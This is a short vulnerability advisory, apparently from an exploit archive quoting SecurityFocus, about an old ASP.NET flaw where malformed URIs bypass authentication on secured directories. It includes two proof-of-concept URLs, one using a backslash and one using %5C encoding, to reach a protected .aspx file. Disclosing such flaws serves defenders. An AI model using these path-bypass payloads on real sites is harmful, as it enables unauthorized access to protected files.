11 lines
No EOL
552 B
Text
11 lines
No EOL
552 B
Text
source: https://www.securityfocus.com/bid/11342/info
|
|
|
|
Microsoft ASP.NET is reported prone to a remote information-disclosure vulnerability because the application fails to properly secure documents when handling malformed URI requests.
|
|
|
|
An attacker may leverage this issue to bypass authentication required to access files in secured directories.
|
|
|
|
Mozilla Web Browser based proof of concept:
|
|
http://www.example.com/secureDirectory\somefile.aspx
|
|
|
|
Microsoft Internet Explorer based proof of concept:
|
|
http://www.example.com/secureDirectory%5Csomefile.aspx |